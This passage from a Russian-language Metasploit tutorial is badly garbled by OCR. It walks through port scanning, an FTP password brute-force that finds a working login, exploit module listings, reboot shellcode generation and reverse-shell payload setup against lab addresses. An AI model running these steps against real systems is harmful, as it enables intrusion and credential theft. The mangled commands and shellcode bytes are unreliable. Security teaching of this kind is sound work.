Рорз іЬе Іаіезі тосіиіе о-РР іЬе зіаск апсі такез іі асііѵе 

5еіз іЬе ргеѵіоизіу ІоаЬесі тосіиіе аз іЬе сиггепі тосіиіе 

РизЬез іЬе асііѵе ог Іізі оР тосіиіез опіо іЬе тосіиіе зіаск 

Ехіі іЬе сопзоіе 

Кеіоасіз аіі тосіиіез Ргот аіі ЬеРіпесІ тосіиіе раіЬз 
Кепате а ]оЬ 

Кип іЬе соттапсіз зіогесі іп а Рііе 
Коиіе ігаРРіс іЬгои§Ь а зеззіоп 
5аѵез іЬе асііѵе Ьаіазіогез 
ЗеагсЬез тосіиіе патез апсі сіезсгірііопз 
Іпіегасі мііЬ а §іѵеп зеззіоп 

Ритр зеззіоп 1ізііп§з апсі сіізріау іпРогтаііоп аЬоиі зеззіопз 

5еіз а сопіехі-зресіРіс ѵагіаЬІе іо а ѵаіие 

5еіз а §1оЬа1 ѵагіаЬІе іо а ѵаіие 

Різріауз тосіиіез оР а §іѵеп іуре ^ ог аіі тосіиіез 

Ро поіЬіп§ Рог іЬе зресіРіесі питЬег оР зесопсіз 

Ідігііе сопзоіе оиіриі іпіо а Рііе аз меіі іЬе зсгееп 

Ѵіем апсі тапіриіаіе Ьаск§гоипсІ іЬгеасІз 

ІІпІоасІ а Ргатемогк р1и§іп 

ІІпзеіз опе ог тоге сопіехі-зресіРіс ѵагіаЬІез 
ІІпзеіз опе ог тоге @1оЬа1 ѵагіаЬІез 
Веіесіз а тосіиіе Ьу пате 

5Ьом іЬе Ргатемогк апсі сопзоіе ІіЬгагу ѵегзіоп питЬегз 


РаіаЬазе Васкепсі Соттапсіз 


СоттапсІ 


Резсгірііоп 


сгесіз 

ЬЬ_соппесі 

ЬЬ_сіі5соппесі 

ЬЬ_ехрогі 

ЬЬ_ітрогі 

ЬЬ_птар 

сіЬ_геЬиі1сі_сасЬе 

ЬЬ_5іаіиз 

Ьозіз 

Іооі 

поіез 

зегѵісез 

ѵиіпз 

могкзрасе 


І_ізі аіі сгесіепііаіз іп іЬе сІаіаЬазе 

Соппесі іо ап ехізііп§ сІаіаЬазе 

Різсоппесі Ргот іЬе сиггепі сІаіаЬазе іпзіапсе 

Ехрогі а Рііе сопіаіпіп§ іЬе сопіепіз оР іЬе сІаіаЬазе 

Ітрогі а зсап гезиіі Рііе (Рііеіуре мііі Ье аиіо-сіеіесіесі) 

Ехесиіез птар апсі гесогсіз іЬе оиіриі аиіотаіісаііу 

КеЬиіІсіз іИе сІаіаЬазе-зіогесі тосіиіе сасЬе 

5Ьом іЬе сиггепі сІаіаЬазе зіаіиз 

Изі аіі Ьозіз іп іЬе сІаіаЬазе 

Изі аіі Іооі іп іЬе ЬаіаЬа5е 

Ьізі аіі поіез іп іЬе сІаіаЬазе 

Ьізі аіі зегѵісез іп іЬе сІаіаЬазе 

Изі аіі ѵиІпегаЬіІіііез іп іЬе сІаіаЬазе 

ЗміісЬ Ьеімееп сІаіаЬазе могкзрасез 


тзР > ЬЬ_зіаіиз 
Ьозіз 


5Ьом іЬе сиггепі сІаіаЬазе зіаіиз 
І_ізі аіі Ьозіз іп іЬе сІаіаЬазе 
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ІооТ 

поТез 

5ѲГѴІСѲ5 

ѵиіпз 

иогкзрасе 

тзГ > 


Из! а11 Іооі іп ТНе сіаРаЬазе 
ІЛзТ а11 порез іп РІіе сІаРаЬазе 
ІЛзТ а11 зегѵісез іп ТГіе сіаРаЬазе 
І_ізР а11 ѵиІпегаЬіІіРіез іп РИе сіаРаЬазе 
5міРсИ ЬеРмееп сіаРаЬазе могкзрасез 


В дальнейшей работе мы будем использовать именно этот вариант интерфейса. 
Еще один вариант интерфейса Меіазріоіі — Агтііа§е. Хотя, как мы уже упоминали, 
в Меіазріоіі есть свой графический интерфейс, он доступен только в коммерческой 
версии продукта. Аппііаде — это графический интерфейс, написанный сторонними 
разработчиками на языке ^ѵа и по умолчанию уже включенный в Каіі Ілніх. 



Рис. 11.1. Бесплатный графический интерфейс Агтііаде 


Вспомогательные модули 

Меіазріоіі содержит сотни вспомогательных модулей (аихіііагу), которые могут 
выполнять такие функции, как прослушивание трафика, сканирование портов, под¬ 
бор паролей, поиск уязвимостей и многое другое. Просмотреть список доступных 
модулей можно, используя команду зЬо\ѵ аихіііагу. 
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тз-р > зіюм аихіііагу 
Аихіііагу 


ІМате 

Рапк ОезсгірТіоп 


Оізсіозиге ЭаТе 


асітіп/2иіге/х5І-(:_ра5 5могсі_ге5еі: 2007-08-15 

погтаі 2ІлІ1ге Сгозз-Бііе РелиезТ Рог§егу Раззмогсі РезеТ ѴиІпегаЬіІііу 
асітіп/апсігоісі/§оо§1е_р1ау_5І:оге_их5 5_х-Ргате_гсе 
погтаі АпсігоісІ Вгомзег РСЕ ТМгои^Ь 6оо§1е Ріау 5Тоге ХРО 
асітіп/арр1е1:ѵ/арр1е1:ѵ_сіі5р1ау_іта§е 
погтаі Арріе ТѴ Іта§е РетоТе Сопігоі 
асітіп/арр1е1:ѵ/арр1е1:ѵ_сіі5р1ау_ѵісіео 
погтаі Арріе ТѴ Ѵісіео РетоТе Сопігоі 
асітіп/а1:§/а1:§_с1іеп1: 

погтаі Ѵеесіег-Рсюі: АиіотаТіс Тапк 6аи§е (АТС) АсітіпізігаТіѵе СІІепТ 
асітіп/Ьаскирехес/сіитр 

погтаі ѴегіТаз Васкир Ехес Ыіпсіомз РетоТе Рііе Ассезз 
асітіп/Ьаскирехес/ге§і5Тгу 
погтаі Ѵегііаз Васкир Ехес 5егѵег Ре§і5Тгу Ассезз 
асітіп/сііготеса5І:/сІіготеса5І:_ге5е1: 
погтаі СНготесазІ: РасТогу РезеТ Ро5 
асітіп/сііготесазТ/сНготесазІі-уоиТиЬе 
погтаі СНготесазТ ѴоиТиЬе РегпоТе СопТгоІ 
асітіп/сі5со/сі5со_а5а_ех1:гаЬасоп 
погтаі Сізсо А5А АиГНепТісаТіоп Вуразз (ЕХТРАВАСОМ) 
асітіп/сі5со/сі5со_5есиге_ас5_Ьура55 
погтаі Сізсо 5есиге АС5 ІІпаиТНогігесі Раззмогсі СНап§е 

асітіп/сі5со/ѵрп_3000_-р-(;р_Ьура55 2006-08-23 

погтаі Сізсо ѴРИ СопсепігаТог 3000 РТР ІІпаиіІіогігесі АсІтіпізТгаТіѵе Ассезз 
ас!тіп/сІЬ2/с1Ь2гстсІ 2004-03-04 

погтаі ІВМ 0В2 сіЬ2гстсі. ехе Соттапсі ЕхесиТіоп ѴиІпегаЬіІіТу 
асітіп/есіігесІ:огу/есіігес1:огу_сіІіо5І:_соокіе 
погтаі Моѵеіі еОігесіогу 0Н05Т РгесИсіаЫе Зеззіоп Соокіе 
асітіп/есіігесІ:огу/есіігес1:огу_есііги1:і1 
погтаі Моѵеіі еОігесіогу еМВох ІІпаиТРіепТісаТесі Рііе Ассезз 

асітіп/етс/а1рііа5І:ог_сіеѵісетапа§ег_ехес 2008-05-27 

погтаі ЕМС АІрИаЗТог Реѵісе Мапа§ег АгЬіігагу Соттапсі ЕхесиТіоп 

асітіп/етс/а1рііа5І:ог_1іЬгагутапа§ег_ехес 2008-05-27 

погтаі ЕМС АІрИаЗТог ЬіЬгагу Мапа§ег АгЫТгагу Соттапсі Ехесиііоп 
асітіп/-ріге1;ѵ/-ріге1;ѵ_уои1;иЬе 
погтаі Атагоп Ріге ТѴ ѴоиТиЬе Ветоіе Сопігоі 

асітіп/Нр/Іір_сіа1:а_рго1:ес1:ог_стсі 2011-02-07 

погтаі НР Оаіа РгоТесіог 6.1 ЕХЕС_СМР Соттапсі Ехесиііоп 

асітіп/Нр/Іір_ітс_5от_сгеаі:е_ассоипі: 2013-10-08 

погтаі НР 1пТе1Н§епТ Мапа§етепі 50М Ассоипі Сгеаііоп 


Использовать любой из модулей можно, воспользовавшись командой ше, а про¬ 
смотреть доступные опции можно командой іпіо. Ниже мы продемонстрируем 
возможности некоторых модулей; начнем со сканера портов. 
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тзі аихіііагу(зуп) > изе аихіііагу/зсаппег/рогізсап/іср 
тзР аихіііагу(іср) > іпіо 

Мате: ТСР Рогі Бсаппег 
Мосіи 1е: аихіііагу/зсаппег/рогізсап/іср 
Нсепзе: Меіазріоіі Ргатемогк ІЛсепзе (В5Р) 

Капк: Могтаі 


Ргоѵісіесі Ьу: 

Ьсіт <х@ЬсІт.іо> 

кгіз каііегз'оЬп <каііег]оЬп@§таі1.сот> 


Вазіс орііопз: 

Мате Сиггепі 5еіііп§ КериігесІ Резсгірііоп 


СОІЧСІІККЕІЧСѴ 

10 

уѲ5 

рег Ьозі 



РЕЕАУ 

0 

УѲ5 

іЬгеасІ, іп тіііізесопсіз 


ЗІТТЕК 

0 

уѲ5 

иЫсЬ іо +/- 

0Е1АѴ) ІП 

тІІІІБѲСОПСІБ 

Р0КТ5 

1-10000 

УѲ5 

КН05Т5 


уѲ5 

ісіепііііег 



ТНКЕА05 

1 

уѲ5 

ТІМЕОІІТ 

1000 

УѲ5 

тіііізесопсіз 




ТЬе питЬег оР сопсиггепР рогРз Ро сЬеск 

ТЬе сіеіау Ьеімееп соппесііопз, рег 

ТЬе сіеіау з'іііег іасіог (тахітит ѵаіие Ьу 

РогРз Ро зсап (е.§. 22-25,80,110-900) 

ТЬе іаг@еі асісігезз гап@е ог СІРК 

ТЬе питЬег оР сопсиггепР РЬгеасіз 
ТЬе 50скеР соппесР РітеоиР іп 


Резсгірііоп: 

ЕпитегаРе ореп ТСР зегѵісез Ьу регРогтіп§ а Риіі ТСР соппесР оп еасЬ 
рогР. ТЬіз сіоез пор пееЬ асІтіпізРгаРіѵе ргіѵі1е@ез оп РЬе зоигсе 
тасЬіпе, мЬісЬ тау Ье изеРи! ІР ріѵоРіп§. 


тзР аихіІіагу(Рср) > зеР КН05Т5 192.168.225.0/24 

КН05Т5 => 192.168.225.0/24 

тзР аихіІіагу(Рср) > зеР ТНКЕА05 10 

ТНКЕА05 => 10 

тзР аихіІіагу(Рср) > гип 


[*] 192.168.225.2: 
[*] 192.168.225.1: 
[*] 192.168.225.1: 
[*] 192.168.225.1: 
[*] 192.168.225.1: 


- 192.168.225.2:53 - ТСР ОРЕМ 

- 192.168.225.1:21 - ТСР ОРЕМ 

- 192.168.225.1:135 - ТСР ОРЕМ 

- 192.168.225.1:2701 - ТСР ОРЕМ 

- 192.168.225.1:8081 - ТСР ОРЕМ 


Если вы внимательно ознакомились с приведенным выше примером, то могли 
заметить, что мы сконфигурировали модуль перед запуском. В каждом модуле 
вы встретите два типа параметров, одни из которых обязательны к заполнению, 
а другие нет. В нашем случае были заданы значения не для всех обязательных 
параметров, вследствие чего модуль использовал те, которые были определены 
разработчиками. 

Как мы уже упоминали, с помощью вспомогательных модулей можно перебирать 
пароли к различным сервисам. Теперь продемонстрируем подбор пароля и имени 
пользователя к обнаруженному ранее РТР-серверу. 
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Ш 2 р аихіІіагу(Рср) > изе аихі1іагу/5саппег/РРр/РРр_1о§іп 
ГП5-Р аихі1іагу(РРр_1о§іп) > іпРо 

Мате: ГТР АиРЬепРісаРіоп Зсаппег 
Мосіиіе: аихі1іагу/5саппег/РРр/РРр_1о§іп 
Псепае: МеРазрІоіР Ргатемогк Ьісепзе (В50) 

Капк: Могтаі 

Ргоѵісіесі Ьу: 

РосіЬ <1:осІЬ@те1:а5ріоіі:. сот> 

Вазіс орРіоп5: 

Мате СиггепР 5еРРіп§ КелиігесІ 0е5сгірРіоп 


ВІ_АМК_РА55ілЮК05 

Раізе 

по 

Тгу Ыапк ра55могсІ5 Рог аіі и5ег5 

ВКІІТЕР0КСЕ_5РЕЕ0 

5 

уез 

Ном Ра5Р Ро ЬгиРеРогсе, Ргот 0 Ро 5 

0В_АЕЕ_СКЕ05 


Раізе 

по 

Тгу еасЬ и5ег/ра55могсІ соиріе зРогесі 

іп Рііе сиггепР сіаРаЬа5е 



0В_АП_РА55 


Раізе 

по 

Асісі аіі ра55могсІ5 іп РЬе сиггепР 

сіаРаЬа5е То Рііе 

1І5Р 



0В_АЕЕ_ІІ5ЕК$ 


Раізе 

по 

Асісі аіі и5ег5 іп РЬе сиггепР 

сіаРаЬа5е Ро Рііе 

1І2Р 



РА55ІДІ0КР 



по 

А 5ресіРіс ра55могсІ Ро аиРЬепРісаРе 

міРЬ 





РА55_РИЕ 



по 

Рііе сопРаіпіп§ ра55могсІ5, опе рег 

Ііпе 





РГ0ХІѲ5 



по 

А ргоху сЬаіп оР РогтаР 

Руре : І105Р : рогР[, 

Руре 

‘: Ьо5р:рогР][. 



КЕС0К0_61ІЕ5Т 


Раізе 

по 

Кесогсі апопутои5/§ие5Р 1о§іп5 Ро РЬе 

сіаРаЬа5е 





КН05Т5 



уез 

ТЬе Раг§еР асІсіге55 гап§е ог СЮК 

ісіепРІРіег 





КРОКТ 


21 

уез 

ТЬе Раг§еР рогР 

5Т0Р_0М_51ІССЕ55 

Раізе 

уез 

5Рор §ие55іп§ мЬеп а сгесіепріаі 

могкз Рог а Но5Р 




ТНКЕА05 


1 

уез 

ТЬе питЬег оР сопсиггепР РЬгеасІ5 

ІІ5ЕКМАМЕ 



по 

А вресіРіс изегпате Ро аиРЬепРісаРе 

1)5ЕКРА55_РИЕ 



по 

Рііе сопРаіпіп§ изегБ апсі ра55могсІ5 

5ерагаРесІ Ьу 5расе, 

опе раіг рег 

Ііпе 


ІІ5ЕК_А5_РА55 


Раізе 

по 

Тгу РЬе и5егпате а5 РЬе ра55могсі Рог 

аіі и5ег5 





и5ЕК_РИЕ 



по 

Рііе сопРаіпіп§ изегпатез, опе рег 

Ііпе 





ѴЕКВ05Е 


Ргие 

уез 

ІдІЬеРЬег Ро ргіпР оиРриР Рог аіі 


аРРетрР5 


РезсгірРіоп: 

ТЬІ5 тосіиіе мііі Ре 2 Р РТР 1о§іп5 оп а гап§е о-р тасЫпез апсі герогР 
5иссе55ри1 1о§іпз. ІР уои Ьаѵе ІоасІесІ а сІаРаЬазе р1и§іп апсі 
соппесРесі То а сІаРаЬазе РЬІ5 тосіиіе мііі гесогсі 5иссе55ри1 1о§іп5 
апсі Ьо5Р5 50 уои сап Ргаск уоиг ассе55. 

КеРегепсе5: 

ііРРр: //сѵесіеРаіІ5. сот/сѵе/1999-0502/ 
т5р аихі1іагу(РРр_1о§іп) > 5еР РА55_РІІ_Е /гооР/ра55могсІ5.РхР 
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РА55_РІІ_Е => /гооГ/раззмогсІз .ГхГ 

тзГ аихі1іагу(ГГр_1о§іп) > зеГ ІІ5ЕК5_РА55 /гооГ/изегз.ГхГ 
ІІ5ЕК5_РА55 => /гооГ/изегз .ГхГ 

тзГ аихі1іагу(ГГр_1о§іп) > зеГ КН05Т5 192.168.225.1 

КН05Т5 => 192.168.225.1 

тзГ аихі1іагу(ГГр_1о§іп) > гип 

[*] СоппесГіп§ Іо РТР зегѵег 192.168.225.1:21... 

[*] СоппесГеЬ Іо Гаг§еГ РТР зегѵег. 

[*] 192.168.225.1:21 РТР - [046/300]- АГГетрГіпе РТР 1о§іп Гог ' Ьаскир ': 'аЬс123' 
[*] 192.168.225.1:21 РТР - [047/300] - Раііесі РТР 1о§іп Гог 'ЬаскираЬс123' 
[*] 192.168.225.1:21 РТР- [048/300] - АГГетрГіп§ РТР 1о§іп Гог ' иріоасі' : ' гооГ’ 
[*] 192.168.225.1:21 РТР- [049/300] - Раііесі РТР 1о§іп Гог 'ирІоасГ :'гооГ' 

[*] 192.168.225.1:21 РТР - [122/300] - АГГетрГіп§ 1о§іп Гог ’ асітіп1234567' 

[+] 192.168.225.1:21 - ЗиссеззГиІ РТР 1о§іп Гог ’ асітіп1234567 ' 

[*]192.168.225.1:21 - Узег ’ асітіп ' Ьаз КЕАР/НКІТЕ ассезз 


Эксплойты 

Эксплойт — это специальная программа, использующая известные уязвимости 
в программном обеспечении для проведения атаки с целью получения контроля 
над системой или вывода ее из строя (отказа в обслуживании). 

Эксплойты бывают удаленными, работающими через компьютерную сеть, и ло¬ 
кальными, запускающимися непосредственно в самой системе. 

В Меіазріоіі эксплоиты делятся на активные и пассивные. Активные начинают 
эксплуатировать определенную уязвимость в ПО сразу же после запуска и закан¬ 
чивают свою работу в случае удачи или провала. Пассивные ждут подключения 
удаленного хоста и только после этого начинают свою работу. Например, мы можем 
запустить эксплойт, отправив жертве клиентскую часть по электронной почте. 
После того как получатель откроет приложение к письму, клиентская часть со¬ 
единится с запущенным ранее эксплойтом, и тот начнет атаку. 

Просмотреть все доступные эксплойты можно, используя команду зЬо\ѵ схріоііз, 
однако, учитывая их огромное количество, это не всегда удобно. 

тзГ > зЬом ехріоігз 

ЕхрІоіГз 


ІМате Різсіозиге 

РаГе Капк РезсгірГіоп 


аіх/1оса1/іЬзГаГ_раГЬ 2013-09-24 

ехсеІІепГ іЬзГаГ $РАТН Ргіѵі1е@е ЕзсаІаГіоп 

аіх/грс_стзсІ_орсосІе21 2009-10-07 

§геаГ АІХ Саіепсіаг Мапа@ег 5егѵісе Раетоп (грс.стзсі) Орсосіе 21 ВиГГег ОѵегТІом 
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аіх/грс_ТТсіЬ5егѵегсі_геа1раТЬ 2009-06-17 

§геаТ ТооІТаІк грс.ТТсІЬ5егѵегсі _ТТ_іпТегпа1_геа1раТЬ ВиТТег ОѵегТІом (АІХ) 

апсігоісі/асіЬ/асіЬ_5егѵег_ехес: 2016-01-01 

ехсеІІепТ АпсігоісІ АЭВ ЭеЬи§ 5егѵег КетоТе Рауіоасі ЕхесиГіоп 

апсігоісі/Ьгом5ег/5ат5ип§_кпох_5тсіт_иг1 2014-11-12 

ехсеІІепТ 5ат5ип§ Саіаху КРІОХ АпсігоісІ Вгомгег ВСЕ 

апсігоісі/Ьгом5ег/5Та8еТгі§ііТ_тр4_ТхЗ§_64ЬіТ 2015-08-13 

погтаі АпсігоісІ 5Та§еТгі§ЬТ МР4 ТхЗ§ ІпТе§ег ОѵегТІом 

апсігоісі/Ьгом5ег/иеЬѵіеи_асісІзаѵа5сгірТіпТегТасе 2012-12-21 

ехсеІІепТ АпсігоісІ Вгомзег апсі ЫеЬѴіем асШаѵазсгірТІпТегТасе Сосіе ЕхесиТіоп 
апсігоісі/Ті1еТогтаТ/асІоЬе_геасіег_рсіТ_і5_іпТегТасе 2014-04-13 

§оосІ АсіоЬе КеаЬег Тог АпсігоісІ асШаѵа5сгірТІпТегТасе ЕхрІоіТ 

апсігоісі/1оса1/ТиТех_гериеие 2014-05-03 

ехсеІІепТ АпсігоісІ 'ТомеІгооТ' РиТех Келиеие Кегпеі ЕхрІоіТ 

арр1е_іо5/Ьгом5ег/5аТагі_1іЬТіТТ 2006-08-01 

§оосІ Арріе І05 МоЬі1е5аТагі ИЬТІЕТ ВиТТег ОѵегТІом 

арр1е_іо5/етаі1/тоЫ1етаі1_1іЬТіТТ 2006-08-01 

§оосІ Арріе І05 МоЬіІеМаіІ ЕіЫІРР ВиТТег ОѵегТІом 

арр1е_іо5/5 5(і/сусііа_сІеТаи1Т_5 5іі 2007-07-02 

ехсеІІепТ Арріе І05 РеТаиІТ 55Н Раззмогсі ѴиІпегаЬіІіТу 

Ьзсіі/5оТТсагТ/тегсапТес_5оТТсагТ 2004-08-19 

§геаТ МегсапТес 5оТТСагТ ССІ ОѵегТІом 


Для того чтобы облегчить поиск нужного эксплойта, лучше воспользоваться по¬ 
иском. 

т$Т > зеагсЬ ехрІоіТ/міпсіомз/ТіІеТогтаТ/ 

МаТсЬіп§ Мосіиіез 


ІМате 

Капк 0е5сгірТіоп 


Різсіогиге РаТе 


ехр1оіТ/міпсіои5/Ті1еТогтаТ/а_рсіТ_маѵ_То_трЗ 2010-08-17 

погтаі А-РОР ІлІАѴ То МРЗ ѵі.0.0 ВиТТег ОѵегТІом 

ехр1оіТ/міпсіом5/Ті1еТогтаТ/аЬЬ5_атр_І5Т 2013-06-30 

погтаі АВВ5 Аисііо Месііа Ріауег . Е5Г ВиТТег ОѵегТІом 

ехр1оіТ/міпсІои5/Ті1еТогтаТ/ассІ5ее_ТоТо5ІаТе_5Тгіп§ 2011-09-12 

§оосі АСР5ее РоТо51аТе РТР Рііе ісі РагатеТег ОѵегТІом 

ехр1оіТ/міпсІои5/Ті1еТогтаТ/ассІ5ее_хрт 2007-11-23 

§оосі АСР5ее ХРМ Рііе 5есТіоп ВиТТег ОѵегТІом 

ехр1оіТ/міпсіом5/Ті1еТогтаТ/асТТах_ітрогТ_и5ег5_ЬоТ 2012-08-28 


погтаі 


АсТіѵеРах (АсТРах) 4.3 СІіепТ ІтрогТег ВиТТег ОѵегТІом 


ехр1оіТ/міпсіом5/Ті1еТогтаТ/асТіѵерсіТ_меЬ§гаЬЬег 

асТіѵеРРР ІліеЬСгаЬЬег АсТіѵеХ СопТгоІ ВиТТег ОѵегТІом 


2008-08-26 


Іом 

ехр1оіТ/міпсіом5/Ті1еТогтаТ/асіоЬе_со11есТетаі1іпТо 
§оосі АсіоЬе СоІІаЬ.со11есТЕтаі1ІпТо() ВиТТег ОѵегТІом 

ехр1оіТ/міпсІои5/Ті1еТогтаТ/асіоЬе_соо1Туре_5іп§ 


2008-02-08 


2010-09-07 


§геаТ 


АсіоЬе СооІТуре 5ІІМ6 ТаЫе "ипірие№ате" 5Таск ВиТТег ОѵегТІом 


ехр1оіТ/міпсІои5/Ті1еТогтаТ/асіоЬе_Т1а5Іір1ауег_ЬиТТоп 
погтаі АсіоЬе РІазЬ Ріауег "ВиТТоп" КетоТе Сосіе ЕхесиТіоп 
ехр1оіТ/міпсіом5/Ті1еТогтаТ/асіоЬе_Т1а5Ьр1ауег_пемТипсТіоп 


2010-10-28 


2010-06-04 
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погтаі АсіоЬе РІазЬ Ріауег "пем-РипсТіоп" Іпѵаіісі Роіпіег ІІзе 

ехр1оі1:/міпсІои5/Н1е-Рогта1:/асІоЬе_Р1а1:есІесосіе_ргесІісІ:ог02 2009-10-08 
§оосІ АсіоЬе РІаТеОесосіе БТгеат РгесіісТог 02 Іп1е§ег ОѵегПом 


ехр1оі1:/міпсІои5/Н1е-Рогта1:/асІоЬе_§е1:ісоп 
§оосІ АсіоЬе Со11аЬ.§е1:Ісоп() ВиНег ОѵегПом 

ехр1оі1:/міпсІои5/Н1е-Рогта1:/асІоЬе_і11и5І:га1:ог_ѵ14_ер5 
§геаТ АсіоЬе ШизТгаТог С54 ѴІ4.0.0 

ехр1оі1;/міпсІом5/Гі1еГогта1;/асІоЬе_]Ьі§2сІесосіе 
§оосі АсіоЬе ЗВІС20есосіе Метогу СоггирТіоп 

ехр1оі1:/міпсІои5/Н1е-Рогта1:/асІоЬе_1іЫ:і-р-р 
§оосі АсіоЬе АсгоЬаТ Випсііесі ИЫІРР Іп1:е§ег ОѵегПом 

ехр1оі1:/міпсІои5/Н1е-Рогта1:/асІоЬе_тесІіа_пемр1ауег 


2009-03-24 


2009-12-03 


2009-02-19 


2010-02-16 


2009-12-14 


§ООСІ 


АсіоЬе Рос .тесііа. пемРІауег ІІзе А-РТег Ргее ѴиІпегаЬіІіТу 


ехр1оіТ/міпсІои5/Н1еРогта1:/асІоЬе_рсІ-р_етЬе(ісіесІ_ехе 
ехсеНепТ АсіоЬе РРР ЕтЬесІЬесІ ЕХЕ 5осіа1 Еп§іпеегіп§ 


2010-03-29 


Еще один пример поиска, 
тз-р > зеагсЬ патеімогсіргезз 
Ма1;сЫп§ Мосіиіез 


ІМате 

Капк ОезсгірТіоп 


Оізсіозиге РаГе 


аихі1іагу/асітіп/Ы;-1;р/мр_си5-1;от_соп1;ас1;_-Рогт5 
погтаі ІдІогсіргезз си5Тот-соп1:ас1:--Рогт5 Р1и§іп 5рь Ііріоасі 
аихі1іагу/асітіп/М:-1:р/мр_еа5усагі:_ргіѵі1е@е_е5са1аі:іоп 
погтаі ІліогсІРгезз ІліР ЕазуСагТ Р1и§іп Ргіѵі1е§е Езсаіаііоп 
аихі1іагу/асітіп/Ы;-1;р/мр_мр1т5_ргіѵі1е§е_е5са1а1;іоп 
погтаі ІдІогсіргезз ІлІРі-МВ ТЬете Ргіѵі1е§е Езсаіаііоп 
аихі1іагу/сіо5/Ь-1;1;р/могсірге5 5_1оп§_ра5 5могсІ_сіо5 
погтаі ІдІогсІРгезз Ьоп§ Раззмогсі Ро5 

аихі1іагу/сіо5/Ь-1;1;р/могсірге5 5_хт1грс_сіо5 
погтаі ІдІогсіргезз ХМШРС 0о5 

аихі1іагу/§а1;Ьег/мр_а11_іп_опе_ті§га-1;іоп_ехрог1; 
погтаі ІдІогсіргезз АП-іп-Опе Мі§га1;іоп Ехрогі 

аихі1іагу/§а1;Ьег/мр_и1-(;іта1;е_с5ѵ_ітрог1;ег_и5ег_ех-(;гас1: 
погтаі ІдІогсіргезз ІЛЬітаІе С5Ѵ ІтрогТег ІІзег ТаЫе ЕхЬгасТ 


2014- 08-07 

2015- 02-25 
2015-02-09 
2014-11-20 

2014- 08-06 

2015- 03-19 
2015-02-02 


Полезная нагрузка 

Полезная нагрузка, или рауіоасі, — это часть программы для проникновения, выпол¬ 
няющая необходимую нам после успешной атаки функцию. Например, используя 
уязвимость в веб-приложении, мы получили доступ к системе с помощью соответ¬ 
ствующего эксплойта. После этого, благодаря второй части (полезной нагрузке), 
мы получим доступ к командной строке взломанной системы. 
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Как вы поняли, эксплойты и нагрузка тесно связаны между собой. В МеГаярІоі!. 
присутствуют три основных типа нагрузок, позволяющие проводить различные 
типы атак. 

□ Одиночки (зіп§1ез) — полностью самостоятельные модули, позволяющие вы¬ 
полнять такие действия, как добавление пользователя, запуск программы и дру¬ 
гие манипуляции с системой, не требующие взаимодействия с пользователем 
или атакующим. 

□ Групповые (зРа^егз) — модули небольшого размера, обеспечивающие удаленный 
сетевой доступ атакующего к скомпрометированной системе. 

□ Этапные (зРа^е) — дополнительные модули, подгружающие групповые модули 
с целью расширения своего функционала. 

Во время создания эксплойта необходимо подготовить и шелл-код, который затем 
будет включен в него. Для генерации шелл-кода, который и станет полезной на¬ 
грузкой, необходимо, прежде всего, выбрать подходящий вариант. 

Для последующей генерации используется команда дспегатс. Иногда приходится 
избавляться от нежелательных символов, например нулевого байта (пиіі ЬуГе). Для 
того чтобы это сделать, необходимо запустить генерацию с параметром -Ъ, после 
которого указать в кавычках коды символов, которых не должно быть в конечном 
коде. Однако следует учесть, что их не всегда можно исключать. В случае недопу¬ 
стимости исключения фреймворк ничего не сгенерирует и вернет ошибку. 

иге рауІоасІ/Ііпих/тіргЬе/геЬооІ; 

тг-р рау1оасІ(геЬоо1:) > ^епегаРе -Ь '\хѲ0' 

# Ііпих/тіргЬе/геЬоо-І; - 124 ЬуТег 

# Щрр: //мии.теіагріоіі: .сот 

# Епсосіег: тіргЬе/1оп§хог 

# ѴЕКВ05Е=Ра1ге, РгерепгіРогк=РаІ5е, РгерепсІЗеІігегиіс^-РаІге., 

# РгерепсІ5е1:геиісІ=РаІ5е, РгерепсІ5е-(;иісІ=РаІ5е, 

# РгерепсІ5е1:ге5§ісІ=-РаІ5е, РгерепсІ5е1:ге§ісІ=РаІ5е, 

# РгерепсІ5е1:§ісІ=-РаІ5е, РгерепгіСМгоо1:Вгеак=РаІ5е, 

# АррепсІЕхі1:=РаІ5е 
ЬиР = 

"\х24\х0е\хРР\хР5\х01\хс0\х70\х27\х24\х0Ь\хРР\хЬ7\х05\х10" + 
"\хРР\хРР\х28\х08\х82\х82\х01\х60\х58\х27\х03\хеЬ\хс8\х21" + 
"\х28\х17\х82\х82\х8Р\х31\хРР\хРс\х24\х0сІ\хРР\хРЬ\х01\ха0" + 
"\х68\х27\х21\хаР\хРР\хРсІ\х8Р\х28\хРР\хРс\х02\хеР\хЬ8\х21" + 
"\х01\х11\х18\х26\х02\хее\хР0\х2Ь\хаР\х23\хРР\хРс\х21\ха6" + 
"\хРР\хРР\х17\хс0\хРР\хР9\х03\х2сІ\хс8\х21\х24\х02\х10\хЗЗ" + 
"\х01\х4а\х54\х0с\х2Р\хЗЬ\хбсІ\хРе\х13\хЗсІ\х2е\хсІР\х1Ь\хРсІ" + 
"\х93\х22\х13\хЗе\х45\хес\х1Ь\х9е\х74\х97\х13\хЗР\х93\х1Р" + 
"\х1Ь\хЬР\хЬЗ\х53\х0Ь\х39\х62\х06\х2е\хЗа\хбс\хР2" 
тгР рау1оасІ(геЬоо1:) > 

Некоторым шелл-кодам требуются дополнительные параметры, необходимые для 
генерации. И правда, откуда фреймворк может знать, с какой машиной должен со¬ 
единиться скомпрометированный сервер? 
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тзГ рау1оасІ(геЬоо-1;) > изе рау1оагі/1ігшх/тірзЬе/5Не11_геѵег5е_1:ср 
тзГ рау1оасІ(5Еіе11_геѵег5е_1:ср) > зЕюм орііопз 

Могіиіе орііопз (рау1оасІ/1іпих/тір5Ье/5Еіе11_геѵег5е_1:ср): 

№ате СиггепТ 5е1:1;іп§ КериігесІ Оезсгіріііоп 


Ш05Т уез ТИе НзГеп асісігезз 

ЬРОКТ 4444 уез ТИе НзГеп рог! 

тзГ рау1оасІ(5Ііе11_геѵег5е_1:ср) > §епегаЕе -о І_Р0КТ=3455, ЕН05Т=192.168.10.1 

# 1іпих/тірзЬе/5Еіе11_геѵегзе_1:ср - 184 ЬуЕез 

# ЕіЕЕр://мілм.теіазріоіі:. сот 

# ѴЕКВ05Е=Га1зе, 1_Н05Т=192.168.10.1, ЕР0КТ=3455, 

# КеѵегзеА11омРгоху=Га1зе, КеѵегзеСоппес-(:Ке1:гіе5=5, 

# КеѵегзеЕізЕепегТНгеасІес^-ВаІзе., РгерепсІЕогк=-РаІ5е, 

# РгерепсІ5е1:ге5иісІ=ГаІ5е, РгерепсІ5е1;геиісІ=-РаІ5е, 

# РгерепсІ5е1:иісІ=ГаІ5е, РгерепсІ5е1:ге5§ісІ=ГаІ5е, 

